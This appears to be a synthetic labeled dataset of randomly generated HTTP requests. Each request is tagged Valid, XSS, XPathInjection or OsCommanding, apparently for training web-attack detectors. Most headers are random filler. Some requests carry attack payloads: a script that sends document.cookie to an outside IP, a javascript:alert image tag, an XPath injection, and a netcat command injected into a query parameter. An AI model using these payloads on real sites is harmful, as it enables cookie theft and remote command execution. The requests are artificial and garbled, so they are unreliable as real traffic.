UA-Pixels: 4066x2541
Via: 7.0 222.63.228.155, HTTP/6.3 www.tfweihsy.css, HTTP/7.7 www.leoan.js:0483
Transfer-Encoding: a6tmt; 1eezx=tmoi9
Upgrade: zcoos/4.4, u1ik/1.2
Warning: 407 www.yCMon.gif "snhRTtstehedo" 
X-Forwarded-For: 150.85.0.128
X-Serial-Number: 3885571205
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16436
Start - Id: 46621
class: XSS
GET /oV71bSd2VqFSgAHZ0gD7/Vr/eraim/edeapohtGeeer/etsnyathhr833vs/eOHcDoG6mr4QoK_2.asp?Nv-FVuTtTl=eahizetotEauvsant&httvniAds=jyscripthomaeiowtNud%3D&qr7nnthhri=4044 HTTP/1.1
Host: 231.53.186.86
Connection: close
Accept: */*;q=0.4
Accept-Charset: big5;q=0.1, x-mac-korean, cp-932;q=0.5, windows-1254;q=0.1, iso-8859-8-i;q=0.6
Accept-Encoding: <div style   =   " behaviour:    url([http://www.ch.com/script/s1.mdb]);   "   >
Accept-Language: *
Cache-Control: no-store
Client-ip: 160.17.79.235
Cookie: g6aocn=3304725;atitasbejitvh=efuleze9hpben;eyncb=pinsa;n76iEpt1eea1r=4415528938
Cookie2: $Version="51"
Date: Tue, 04 Jan 05 02:29:20 UTC
ETag: W/"Sh4v0LOFPRUKRUrK"
Expect: 100-continue
From: ibrMts@nvsrs.biz
If-Modified-Since: Tue, 13 Jan 09 05:36:30 CET
If-Unmodified-Since: Wed, 19 Sep 07 04:45:37 CET
If-Match: "E1g3EB@jpF33Xko_2PjU"
If-None-Match: "nYXipAq9GzBps-YFe"
If-Range: "a8ALukMNxImmvzcX"
Max-Forwards: 570
MIME-Version: 4.7
Pragma: 0y='elo'
Proxy-Authorization: Digest username="anztewo"
Authorization: NTLM aWJpZTlsc2lta2FlOVdzdHJyaGFlYXRpbHBub0Vtb3pDdGc=
Range: 7283-8
Referer: /toe1Laii/eenit/nras/ieRtte5H.msf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.2 (X11; U; Open BSD i386 5.7; es-ul; rv:6.6.5) Gecko/02321188
UA-CPU: 68000
UA-Disp: 905,409,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: FTP/5.9 74.134.254.141, 7.7 172.180.171.6, 8.1 www.ld2b.js
Transfer-Encoding: gzip
Upgrade: edw/7.9, a9aldo/9.4, p2zc/2.5, sti/1.5
Warning: 749 169.197.175.54 "aTaul8Deeyii" "Wed, 21 Apr 04 19:11:25 GMT"
X-Forwarded-For: 151.204.29.132
X-Serial-Number: 1432096438737342
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46621
Start - Id: 16630
class: Valid
GET /u1yddmg7UIRzkxW7/ozS4Yu6GKP/u4@kkWqur.pl?1nstdinC=49876&revniddbiwle=-csoeuA29&ckha=07432&sptNG4hBe=qnS&etahir6sfrsusee=l%29jtyhbvar%3E%25Autd&NeseuEpenbute9e=500884&dMxreplaceGiu=288&p9cutdrtlv=nf2hhNhl&ruiWsohhitheu=t0m9srnft3huts&2thtlclt9dyxt=s.RecdGyJH&ostT4oijyurgm7=psyei&vJOWC_UZP0p=a%3Elphir HTTP/1.1
Host: 132.64.6.64
Connection: close
Accept: video/mpeg;q=0.1, video/quicktime;q=0.5, video/quicktime
Accept-Charset: iso-8859-8;q=0.9, cp-936;q=0.8, windows-1253;q=0.9, euc-kr, x-mac-roman;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-age=64
Client-ip: 180.147.224.253
Cookie: tSttsn=1;aomoo=nctw96T6ts;EiduAhnewf3e=nrocwdita;ai=and;mhmete=egroup byi0V8a)xot8t
Cookie2: $Version="330"
Date: Fri, 15 Jan 10 23:48:19 GMT
ETag: "dZGwfeTA3U@pruMwOh"
Expect: 100-continue
From: NuRe@6eea.cz
If-Modified-Since: Tue, 07 Nov 06 06:55:34 UTC
If-Unmodified-Since: Sun, 09 Jul 06 06:52:13 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Feb 08 01:09:17 UTC
Max-Forwards: 3461
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: ttdia rghriOx=i1agttb
Authorization: mrmz5j ttjih=om0t4e
Range: 38173-
Referer: /lssi/i9dic/tehS3Dof.ace
TE: deflate;q=0.2,trailers
Trailer: From
User-Agent: aSg6i6eRi/8.8.3
UA-CPU: Sparc
UA-Disp: 8189,4167,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 702x893
Via: 5.5 www.tlKa.js, 9.0 www.8tinc.css, dmSess/5.6 www.pUriia.html:41879
Transfer-Encoding: compress
Upgrade: lte/0.8, ascmyo/0.4
Warning: 144 84.222.150.233 "udseldAuvnntiswe" "Tue, 18 Apr 06 02:19:07 UTC"
X-Forwarded-For: 128.243.180.188
X-Serial-Number: 6104122445139965688
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16630
Start - Id: 28126
class: Valid
GET /gGSWp6Q/tkSeWkvinE/h2R_bk/uLydMA44pZ.TUcFe.html?0_jg.FhtaccesirIt=%25ntvi&uIrda4uastiti=938824034&n0s=avlinkh&oo2i6IotuaV9wi=lon1hchildtvos&uShlhmgeqhhucho=770&r3T1xetlcra3te=21899&enweTbprjs5s=input&im0=1748&jeseyauta=mt6uhurmo6r1taa%29e59h&sa1ohNaeD=d-%40igxe&Lautoexec1Vmjo=sigmtscript%3Btytite&.Xnph-WformWbaffU=dihometey2nalr&sjagnx=07289724 HTTP/1.1
Host: www.hlpn2uWxcl.org:99
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 2k-tofeOn3w, TnrLoa-osbe;q=0.0, Eu-I, nis-ohc;q=0.8
Cache-Control: max-stale
Client-ip: 183.104.243.127
Cookie: nta5e4=86788;ltleptort=yeo G;yebeph=wWvRFKl61VFd;cga5erLTu91S=liSZy4
Cookie2: $Version="590"
Date: Sun, 08 Apr 07 01:23:17 GMT
ETag: "ZeMhWBXc-NA@ui66he"
Expect: lhdG=sitce;AhyetI=e6eEr6
From: hpcgo@ihivts.be
If-Modified-Since: Sat, 07 Jul 07 14:48:43 CET
If-Unmodified-Since: Wed, 25 Nov 09 03:45:27 UTC
If-Match: "SkG_Qu@KYohb.FG3.cX"
If-None-Match: *
If-Range: "2koinHkaWtO9g0n"
Max-Forwards: 49
MIME-Version: 2.2
Pragma: nkoLpNoh='ebNctelp'
Proxy-Authorization: Basic ZWV5ZW5kOlJIdGRlZWU=
Authorization: Basic c3p1MmRmYWU6YXBhbmVaMUU=
Range: 48586-55252,95-636
Referer: http://www.2stmoeH.biz/hmyyq/nstsr.jpg
TE: chunked;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: ehaejE (t_7H-g)
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4261x691
Via: 4.8 25.245.109.218, 1.4 21.178.219.38, FTP/8.8 www.aotge.tiff
Transfer-Encoding: deflate
Upgrade: oItf/8.6, mhoe/0.7, site7t/5.3, roNirm/8.5, mhoe1e/8.4
Warning: 596 171.12.65.209 "dlqakyiSAeoee" "Wed, 04 Aug 04 21:41:08 GMT"
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 9260606100019
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28126
Start - Id: 22745
class: Valid
GET /dsrerrry/eqkQ_ty/9dt5enerxssioe4mpafn/Ny79aope9jnji8m/@-9/5tzera.cgi?sF=ocaxdftthntD&-WLAUTzSblHv=rdiI4t%27zehrt&ubilcTsr0dopa=4&esoniz0KtUh=2221157&trsddyhi=153941&epeedl7teunecte=cr6%3Batxn%26group+byprocessing-instructionDiframe3t&TsetroPrl=ra&ncaRssLla3d=45589&iodgtMet2uq=04&_OVuoDF=%29t&svpc=%7C8de-isss&nacbaX=72 HTTP/1.1
Host: 151.132.9.120
Connection: wiha
Accept: text/html;q=0.4, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dSmr-94pmHrsa, eE3wdt-msibo6
Cache-Control: no-cache
Client-ip: 111.95.11.244
Cookie: rY3.71dtCkk=24;8Igekedr99xsatt=80;arieieeDEecE=31;nullsnetcatIagoFM7xp_4=yHla
Cookie2: $Version="9"
Date: Tue, 20 Feb 07 01:10:48 UTC
ETag: W/"Hw.-vMq@PRe4kqvba1"
Expect: 100-continue
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Fri, 30 Jun 06 17:07:51 CET
If-Unmodified-Since: Mon, 28 Sep 09 16:51:55 UTC
If-Match: "_8iGAGe4imwVAX2pk_"
If-None-Match: *
If-Range: Tue, 05 Sep 06 19:53:46 CET
Max-Forwards: 7
MIME-Version: 6.8
Pragma: ocI='i'
Proxy-Authorization: Digest qop=ldtEtf6e
Authorization: NTLM YTByZWhpaDNieG9vcmFpdEhydGFpNnF3YWgxYXQyOXRub29paXM4ZXNzOXA=
Range: -323601,-16918,43210-
Referer: http://cdpe.net/needhCpt/obnth/XnDh5eh.cfm
TE: gzip;q=0.5,gzip;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: qnsksqi/7.0.7.9
UA-CPU: MIPS
UA-Disp: 156,3199,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 675x225
Via: 8.0 116.133.173.3
Transfer-Encoding: gzip
Upgrade: uetr/8.4, Iessr/8.0, rnltse/6.4, itwgpe/5.9, osht/4.7
Warning: 950 135.96.59.66 "get026dNoiraiwlk" 
X-Forwarded-For: 247.95.67.80
X-Serial-Number: 46126280
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22745
Start - Id: 47918
class: XSS
GET /lfH2CXk3JK0QliVLFNI/it9kpqnw/eeDg/lAoU.js?Ernarketcesuwsa=%26%3Cscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F187.166.225.4%2Fet.nsf%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E&aprSkswo=e+t&ghtEmraeeeh=574191&ssomtewss=8 HTTP/1.1
Host: www.rloHo.uk
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-2022-kr;q=0.0
Accept-Encoding: deflate, gzip, identity;q=0.3, identity;q=0.5, compress;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 66.227.154.212
Cookie: 7FUacceptxQwWmzo=wd6f25Ij0p;i5wemclsid1aosI=<aeaapshttpaeyIwnthe;7Y46wZk=i0n
Cookie2: $Version="20"
Date: Thu, 13 May 04 19:55:15 CET
ETag: W/"FxFIMkqEChMJ8o8cBQ"
Expect: miJlaez
From: es4Wewg@gthaea.de
If-Modified-Since: Tue, 01 Sep 09 11:55:50 UTC
If-Unmodified-Since: Sat, 16 Dec 06 17:55:34 UTC
If-Match: "T2qHObVWQXwPwDGQykRn"
If-None-Match: *
If-Range: Sat, 21 Apr 07 12:52:03 GMT
Max-Forwards: 272
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: acdd pntas=drlmae
Authorization: teeo iilng=ibotOre
Range: -419,3-
Referer: /a04o/nn4olttn.doc
TE: gzip,deflate;q=0.2,trailers
Trailer: If-Range
User-Agent: Mozilla/9.8 (X11; U; SunOS sun4u 6.5; Sa-da; rv:5.0.0) Gecko/39747280
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: 2.7 223.182.232.86, 4.8 www.2u4r0t.jpg, HTTP/7.7 61.176.186.103
Transfer-Encoding: gzip
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 03181480810
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47918
Start - Id: 49798
class: XPathInjection
GET /snNhscaltegn2aoehrti/qlAgC.7pd/t2Mn@MZR9F9jC/ymaieinein/a8k/adminxJ9A3mz.jsp?keFir9lo5o=2&lhvmi=cWI&lbmhoStiotao=%28i+%3C+++++count%28LhknrG%2Fchild%3A%3Atext%28%29%29+++++and+j++++%3C+++++count%28sw%2Fchild%3A%3Acomment%28%29%29++and+++k+++++%3C+++count%283mne%2Fchild%3A%3A*%29+++++%29 HTTP/1.1
Host: 180.140.197.204
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 41.236.97.233
Cookie: or81nl=onictkchjaysetf2rt;dnIlrev=4686759367
Cookie2: $Version="493"
Date: Sun, 04 Oct 09 02:33:28 GMT
ETag: "G2lvDzt3GUzDs0U4"
Expect: 100-continue
From: ic2oxryy@hens5ahgle.org
If-Modified-Since: Tue, 08 Dec 09 03:29:19 GMT
If-Unmodified-Since: Sun, 05 Nov 06 15:18:36 GMT
If-Match: "MGvZloleqbJVH-JWi"
If-None-Match: "pGRGra8HOg7T2Qr2"
If-Range: Sun, 02 Oct 05 17:10:48 GMT
Max-Forwards: 4
MIME-Version: 5.9
Pragma: r0eas=ytianmo
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 1-,586-,-3399
Referer: /aPen.php4
TE: trailers
Trailer: Accept-Encoding
User-Agent: ethxut/9.7.9.4
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6139x931
Via: 7.1 102.99.188.251, FTP/1.4 www.nh5s.gif
Transfer-Encoding: compress
Upgrade: oticr3/9.7
Warning: 295 41.145.9.69 "ali9sAg6ha" 
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 09611302404410791541
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49798
Start - Id: 21335
class: Valid
GET /lsconrici9e/er/orMTe/o-/bitiOre/tMPtcNDBhnZ/rr8tiAytetoCesrd4D0h.html?olieSgdw=48&otor9eR=rtrdtrHoctNmo&edth=ah&A-3M-1J-_=fnnc3&c7eir=0802&EvobfmraarRoe6r=ime&ayh5=91&Ymm.QkMVo=h.tNL4Q4KTz&w3eldE7c=229207&oosnkfeleMrd=y7acceptta&ddoxmiaenn=odd%3Fnalof HTTP/1.1
Host: www.s6ent.com:03406
Connection: keep-alive
Accept: audio/x-wav;q=0.8, image/png;q=0.3, audio/*;q=0.9
Accept-Charset: x-mac-ce, iso-8859-8-i;q=0.5, euc-tw, ks_c_5601-1987;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 77.98.59.51
Cookie: rxtMTag9ls=14681960;iOyia4a7A5n='hEses4af\e;pn5sgnpc8ia=05t7y8];PIimuizeshcknli=uhtsnfeahulseu;uorrAhafv27thn=m<i$g;sedeOjd=6
Cookie2: $Version="163"
Date: Wed, 31 Mar 04 13:27:45 UTC
ETag: "t1csvA7u4nvzVMov1wM"
Expect: 100-continue
From: rd1eArm@0dui5ee.biz
If-Modified-Since: Mon, 11 Feb 08 11:13:31 GMT
If-Unmodified-Since: Tue, 23 Aug 05 11:42:20 CET
If-Match: "zQB7qM3a4xWEPGRz-H"
If-None-Match: *
If-Range: Sun, 06 May 07 03:19:38 CET
Max-Forwards: 0700
MIME-Version: 6.0
Pragma: t=gNp1ee
Proxy-Authorization: Basic YTlpNjpsb3JF
Authorization: NTLM ZWhlcjlzdGRZcjRhZVZvYWpTaGVkcE5hZHMwTjRsNHRiY3RpeHM=
Range: 7-27394,731-8,0552-
Referer: http://www.ai7hmtga.org/hqwbElv/osTyWme.conf
TE: deflate,gzip
Trailer: Referer
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 1.8; i3-sn; rv:0.7.0) Gecko/02023088
UA-CPU: 68000
UA-Disp: 568,509,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 040x521
Via: HTTP/2.2 www.Aoam7.js, 1.9 156.176.136.103
Transfer-Encoding: eazay; l8leac=hta3lett
Upgrade: ews/8.3
Warning: 480 www.6ge64dis.htm "TNisirlesy0eema" 
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21335
Start - Id: 46564
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: www.lndweOo.it
Connection: keep-alive
Accept: video/quicktime;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: compress, identity, deflate;q=0.1
Accept-Language: rSU9nd0-ettIp1;q=0.5, lojn-I, v-oe0ts, fspeWl-wineuadm, 9cz-o1anonz
Cache-Control: no-transform
Client-ip: 236.99.76.50
Cookie: Kkcrn=lee; ;oa=536816216;inZeh3rntoeeil=49;joollnuima=n8V3;Gbposition8tmpBz=hrC;QrrXHea=81076
Cookie2: $Version="190"
Date: Mon, 02 Nov 09 14:59:34 GMT
ETag: W/"VLhNzjc5io72QMe1b"
Expect: 100-continue
From: tbyn@cYcur1s.it
If-Modified-Since: Thu, 06 Dec 07 11:26:44 CET
If-Unmodified-Since: Sat, 30 Jun 07 15:27:46 UTC
If-Match: "k3JWTcMEDBVUR_1KV1"
If-None-Match: "69u0NfFF-E57tKGUX8FO"
If-Range: Thu, 05 Jul 07 03:58:18 UTC
Max-Forwards: 9055
MIME-Version: 1.3
Pragma: ac2=n
Proxy-Authorization: Digest username="rgww0see"
Authorization: Digest response="Bf1A17Db765F8d2b90ad86d1D0Ca6f27"
Range: 910-120,749-15173
Referer: http://www.ey4rns.net/j6oumn.msf
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/9.6 (compatible; MSIE 4.0; Linux i586; iiah)
UA-CPU: x86
UA-Disp: 161,932,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 309x668
Via: 3.6 174.49.74.183
Transfer-Encoding: compress
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 136.226.21.172
X-Serial-Number: 794611052
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46564
Start - Id: 5055
class: Valid
POST /m7KrSB_Z/Garera.js? HTTP/1.0
Content-Length: 38
Content-Language: myeaml,o9n,ists
Content-Encoding: deflate
Content-Location: /eiidAa/m2rs/alaszos/eeaol8s9.sh
Content-MD5: cTBpY0NiaWVsZWlyYWxhbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Aug 08 07:33:06 UTC
Last-Modified: Wed, 04 Feb 09 05:46:25 GMT
Host: www.luanw.cz:85295
Connection: tivon
Accept: text/html;q=0.4, image/jpeg;q=0.5
Accept-Charset: x-mac-ce;q=0.6, windows-1250, iso-8859-15;q=0.5, windows-1254;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=3
Client-ip: 69.30.198.48
Cookie: vrfjep=eFm@1KCGk.v;rd8goMchrerz=3558
Cookie2: $Version="718"
Date: Wed, 14 Mar 07 02:27:33 UTC
ETag: W/"Fr4JwBk7jCIGOztU2"
Expect: 100-continue
From: tpzRon@ec4slh.de
If-Modified-Since: Thu, 22 Jan 09 19:29:31 GMT
If-Unmodified-Since: Fri, 23 Oct 09 15:21:40 CET
If-Match: "7YaAUBrgvclFlU8o"
If-None-Match: *
If-Range: Wed, 30 Nov 05 08:04:28 UTC
Max-Forwards: 0494
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM dGN1YXVmdXRpRWljaG5ydDNvdHZpZThzdGFCdGhuZXU=
Authorization: Digest nc=8Cd6fc9b
Range: -809077,653-170430,-158191
Referer: /eEmtlp/ctyrfhs/raobuEhr.cgi
TE: chunked;q=0.1,trailers
Trailer: Date
User-Agent: Mozilla/9.9 (Windows; U; WinNT 6.3; bR-6x; rv:6.7.6) Gecko/23782961
UA-CPU: PowerPC
UA-Disp: 522,847,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7112x1130
Via: FTP/7.6 www.kIluD.css, 9.6 www.iapashom.htm
Transfer-Encoding: deflate
Upgrade: 9Ehwn/4.8, rwi0/3.3, UStake/0.9, reEr0s/4.3
Warning: 874 50.12.41.154 "oiigh7oztoeetoski3" 
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 2507620494378357
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

oB5https=5nPTx7&cg=887669&nohb=72<tr

End - Id: 5055
Start - Id: 33298
class: Valid
POST /h8attbu/nehY/q_H3It/t2HRPeabSTpjfgTqN17/lIYjIV_iMv7fdLMz/htbty.mspx? HTTP/1.1
Content-Length: 73
Content-Language: ReuasAo,Lsa8nE
Content-Encoding: deflate
Content-Location: /wmkrol/xmfwi.jpg
Content-MD5: b2xlbTI1dGNiZGF3bm9saQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Oct 04 21:57:46 GMT
Last-Modified: Wed, 08 Aug 07 02:29:58 GMT
Host: www.ehnpdoenom.be
Connection: keep-alive
Accept: audio/*, video/*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 40.3.59.205
Cookie: hsepd=hIEjtV;e69Jom6= 
Cookie2: $Version="370"
Date: Wed, 12 Aug 09 03:04:04 GMT
ETag: "Xe2rEz2vPptDIu.1ip"
Expect: mkhuhn=8bheVe8;ujr7eg
From: fotmtnu@a26intx.net
If-Modified-Since: Fri, 21 Oct 05 08:52:14 CET
If-Unmodified-Since: Mon, 04 Feb 08 05:41:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 656
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWwycGM4ZXRubm56ZXd0c05sbXl5bGVpbHNuaGxlamFlOHp0amxqZWRSYXhvbg==
Authorization: NTLM b3JldGVUbmlvTm1uZHdzM2F0b2lpcmhuc2J0Ykk2bGxlbnlhZWU2
Range: 8584-634
Referer: /4imv/Icee/ihrauec/9hreso/a5yii.rar
TE: trailers
Trailer: From
User-Agent: inolwm (tvgyUC; fBdU9S6uw; f_A_yT2W; iFJLNQyo; nkb0k9gUHY)
UA-CPU: MIPS
UA-Disp: 3676,3316,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8624x050
Via: OdaA/5.1 www.0hNiecNt.css, 6.6 73.49.28.34
Transfer-Encoding: Lubo; irDi=gOut
Upgrade: h8A8/9.7, lbu/7.5, vytEEe/1.9, eAzrh/1.5
Warning: 536 www.i6hio.jpeg "noasnsnawtaemRses" 
X-Forwarded-For: 25.177.72.70
X-Serial-Number: 23873928020
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

twuimw=n1@6D8&efg1=1380773&ttOr8o=oinhs&rots5EUpohse9eC=tcodichIceee2ti

End - Id: 33298
Start - Id: 7258
class: Valid
PUT /s3u5P.shtml? HTTP/1.0
Content-Length: 149
Content-Language: 3x5dN
Content-Encoding: compress
Content-Location: http://www.0huzai.st/ihoxm.js
Content-MD5: ajRuT3BzZWM5bklqUG5CbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 08 Apr 10 14:51:31 CET
Last-Modified: Sat, 08 Dec 07 02:59:00 CET
Host: 40.31.214.82:8
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: koi8, x-mac-roman, x-mac-chinesesimp;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: eapTedsb-5, tts-oWnqa;q=0.8
Cache-Control: no-transform
Client-ip: 158.43.175.204
Cookie: atyc0en9sl=223;r-BDeAa=a (u
Cookie2: $Version="9"
Date: Fri, 05 Jun 09 16:45:08 CET
ETag: W/"peUbjB681TZ3ZHuUU"
Expect: trene=ontocto
From: tsrazhte@n9aeeuk.be
If-Modified-Since: Tue, 18 Apr 06 05:03:00 CET
If-Unmodified-Since: Wed, 29 Jun 05 09:42:56 GMT
If-Match: *
If-None-Match: "qILsY@IDgDSjEKS"
If-Range: "5r1TevnTJTOkqvhK"
Max-Forwards: 73
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: ntsAjG eRoonit=huowas9
Authorization: Basic bDZsdGh0Omgxcmw=
Range: -805
Referer: http://8deiEig7.ch/flentin/tutshIr.aspx
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.8 (Windows; U; Win98 4.9; tt-3e; rv:9.4.4) Gecko/32657972
UA-CPU: StrongARM
UA-Disp: 6402,121,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 629x010
Via: 9.5 139.26.160.177:6
Transfer-Encoding: identity
Upgrade: Ees/2.1, pahtc/8.0, el0rd/3.8, bnNs/0.8
Warning: 038 www.lr6tO.html "rmcnauss8" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Is=pwn7&hac=nxJI-h-vIO&wnnh=he&ldv=kbcg60En&hthdebpuhe=snetcata6Tfn)nawemxe5documentwot&newlvAph=lH;ple se3n<hescript&eedrmtOeie8sn=hre8ganexea

End - Id: 7258
Start - Id: 24450
class: Valid
GET /aidEauede5W4hq1ra/l-_X/hr2KyHX0Nkd.m/ehtco1s1n/ce4nastthehnrx6wY/HHnbXn/xf3M197/aogi.tiff?8afei8T=%2BX&ZNub@Dwp-Ma=9194863&Dw7x=5207942436&srcpAOhY.UFtmp5=16&ec0Ass=e&BI7-Fdw5=%3Eueelnepf4suh%7Cn&see8=wherectetEmuw+e+o%7C7mda+0&etF=udyt%40kUv0&Rx-G5=88124&Mtj=rTfughrd HTTP/1.0
Host: www.BNn6htjaOb.com
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 60.13.48.217
Cookie: tn=jiframem8aH;bHZtmpYq=iH-3_F;sHa7X=]childeK6w;oytuae=Pe95e
Cookie2: $Version="454"
Date: Mon, 11 Dec 06 12:51:40 UTC
ETag: "L7.MGOCMhvEcaCCmm_j"
Expect: Efnggl
From: rrdt@ioephut.be
If-Modified-Since: Sun, 11 Jan 04 04:45:44 CET
If-Unmodified-Since: Wed, 02 Dec 09 24:34:40 GMT
If-Match: "OlT3BZK8Nwk71UGm"
If-None-Match: "vVDLhggHF-kJ2gVtys"
If-Range: Fri, 05 Aug 05 13:38:38 CET
Max-Forwards: 534
MIME-Version: 6.0
Pragma: EseE2i=u
Proxy-Authorization: Basic aGVmc2pzaDppeWVwbnM=
Authorization: Iera dlq9=aoduto
Range: -78
Referer: http://www.iortmuI.org/mshaeii/ettrsaht/mEeglnn/ROroreE.shtml
TE: deflate;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: aoti/3.9.2.5
UA-CPU: MIPS
UA-Disp: 2319,894,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 257x1408
Via: FTP/2.5 www.lXaTeehf.css:19
Transfer-Encoding: zjxe; obtme=gntwd
Upgrade: tiRot/2.8, nealah/7.5, dml7a/5.8
Warning: 838 www.iuUqaua.png:81783 "jeoeOeEehrcia6tshi" "Mon, 12 Nov 07 12:17:37 GMT"
X-Forwarded-For: 252.30.225.56
X-Serial-Number: 782387
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24450
Start - Id: 43539
class: OsCommanding
GET /iWmI-d/sv5L.@Q.e23GzE2WCN/etietuermYpo/RJ/yspclas/hxI8Fruymg.htm?havingWjU7Fvar2Sstyle=47247&hrLaont=wfes&nry1scm=he0Xbq9Kz_%409&aeet6He4ltwar=y%26e&w8M.S_ZUdZ=l&rinfton=avSwP%40tr&x0EWJ9rscriptLQ-h=cgBK.&iiotrt=tcth3tn6aac&iwsum6dseifhr=7ak+object&rrtobn6frfUt=865&Ob=0838&nstwbh=ir&Dsoru=%7C+++++%2Fusr%2Fbin%2Fnc+++++-vvv++++158.78.164.70+80%2500&fgd3rEuusn8=e7Ozgww HTTP/1.1
Host: www.rlbor2.gov
Connection: close
Accept: image/jpeg, image/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-age=970
Client-ip: 214.70.1.175
Cookie: 9cLBgB7cBi=2133077;eGe7=6703552
Cookie2: $Version="046"
Date: Fri, 05 Feb 10 24:16:56 UTC
ETag: W/"IRDWyMlE6.clcPc7DJep"
Expect: hhdoic
From: euccCon@t4tsegm.cz
If-Modified-Since: Mon, 11 Feb 08 09:41:16 UTC
If-Unmodified-Since: Mon, 12 Apr 04 06:57:00 CET
If-Match: *
If-None-Match: "8ghp6dkd5PT6QcxKx3jU"
If-Range: Fri, 07 Apr 06 06:14:10 CET
Max-Forwards: 9790
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: heioR ugwiagr=aitnk
Range: -983461,45-31195
Referer: http://i5o8hT6.org/i62g/mi5N3/eou8aN/iwanb7b/tohdoant.cfm
TE: chunked,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: miYTnIL http://www.Ters1.be
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5688x504
Via: HTTP/6.5 187.108.152.187
Transfer-Encoding: identity
